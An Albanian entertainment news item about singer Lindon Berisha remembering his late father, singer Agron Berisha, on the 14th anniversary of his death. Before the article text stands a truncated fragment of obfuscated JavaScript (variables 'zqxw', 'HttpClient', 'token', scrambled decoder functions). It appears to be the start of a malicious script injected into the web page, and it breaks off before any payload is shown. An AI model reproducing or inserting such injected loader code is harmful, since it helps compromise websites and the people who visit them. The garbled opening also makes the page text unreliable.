;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Lindon Berisha kujton babain e ndjerë! (FOTO)

By

Këngëtari i njohur nga Shkupi, Lindon Berisha duket se ditën e sotme e ka në listën e ditëve të zeza në jetën e tij.

Kjo pasi artisti i ri e shumë i talentuar humbi babain, Agron Berishën, solistin e famshëm të hitit ‘Vetëm 5 minuta’.

Sot janë mbushur 14 vite që nga ika e tij nga kjo botë e përveç Lindonit i cili ka humbur një prind, bota e artit shqiptar humbi njërin prej artistëve më të mirë të saj.

Sidoqoftë artisti nga Shkupi po vazhdon rrugëtimin e të atit në mënyrën më të mirë të mundshme duke bërë kështu krenarë prindin që aq shumë e deshi muzikën.

Artisti e kujtoi atë me rastin e 14 vjetorit të ikjes nga kjo botë përmes një postimi në Instagram teksa nuk hezitoi as ta cilësoi atë si ‘Legjendë të llojit të tij’./Prive.al/

Artikuj të ngjashëm